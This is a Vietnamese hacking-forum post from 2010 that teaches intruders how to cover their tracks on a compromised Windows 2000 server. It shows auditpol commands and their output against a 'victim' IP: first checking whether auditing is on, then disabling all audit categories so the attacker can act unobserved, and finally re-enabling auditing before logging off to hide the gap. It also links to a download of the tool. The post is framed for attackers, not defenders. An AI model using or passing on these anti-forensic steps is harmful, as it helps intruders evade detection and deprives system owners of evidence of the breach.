Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

Hacker :: Security :: Hacker and Security
 

 Bật ( tắt ) audit record bằng auditpol (for Server 2k)

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Bật ( tắt ) audit record bằng auditpol (for Server 2k) Empty
Bài gửiTiêu đề: Bật ( tắt ) audit record bằng auditpol (for Server 2k)   Bật ( tắt ) audit record bằng auditpol (for Server 2k) EmptySat Oct 23, 2010 4:12 pm
Một trong các bước quan trọng của hacker khi đã thâm nhập được vào Server là tìm cách xóa dấu tích của mình trong Audit
Record.(audit là chức năng lưu lại tòan bộ hành động thâm nhập và thay đổi của hacker vào server , cho dù bạn có thâm nhập
thành công hay không). Có nhiều cách để xóa log này. Tôi sẽ chỉ cho các bạn 1 cách rất đơn giản và hiệu quả là dùng tool
auditpol. Auditpol không xóa file log ( trong nhiều trường hợp xóa file log không phả là giải pháp tốt để xâm nhập lâu dài ),
mà nó chỉ disable chức năng audit. Bạn cũng có thể enable chức năng này sau khi rút lui ( logoff ).
Cách dùng auditpol rất dễ. Trước tiên bạn thử kiểm tra xem máy victim có bật chế độ audit không (auditpol chạy trong môi trường DOS):

C:\auditpol IP_victim
Running ...

(X) Audit Enabled

AuditCategorySystem = Success and Failure
AuditCategoryLogon = Success and Failure
AuditCategoryObjectAccess = Success and Failure
AuditCategoryPrivilegeUse = Success and Failure
AuditCategoryDetailedTracking = Success and Failure
AuditCategoryPolicyChange = Success and Failure
AuditCategoryAccountManagement = Success and Failure
Unknown = Success and Failure
Unknown = Success and Failure

Nó sẽ hiện ra tất cả các chức năng của audit và tình trạng hiện thời của các chức năng đó ( đang bật hay tắt )
Cái mà bạn cần lưu tâm nhất là dòng thông báo đầu tiên " (X) Audit Enabled ". Như vậy audit trên máy victim đang họat động.

Ta chỉ cần tắt audit bằng lệnh:

C:\auditpol IP_victim /disable
Running ...
Audit information changed successfully on IP_victim ...
New audit policy on IP_victim ...

( 0 ) Audit Disabled

AuditCategorySystem = No
AuditCategoryLogon = No
AuditCategoryObjectAccess = No
AuditCategoryPrivilegeUse = No
AuditCategoryDetailedTracking = No
AuditCategoryPolicyChange = No
AuditCategoryAccountManagement = No
Unknown = No
Unknown = No

Bây giờ thì bạn yên tâm tung hòanh trong máy victim mà không sợ bị theo dõi...Smile
Trước khi logoff bạn cũng đừng quên trả lại trạng thái ban đầu cho audit nhé. Bạn dùng lệnh

C:\auditpol IP_victim /enable

Bạn có thể download auditpol tại www.download.tungxeng.net.ms


Về Đầu Trang Go down
 
Bật ( tắt ) audit record bằng auditpol (for Server 2k)
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Hack IIS server bằng UNICODE bug :
» Ẩn IP bằng Stealther
» Hack ICQ bằng C :
» Đổi passAdmin bằng VB :
» DoS bằng Python

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến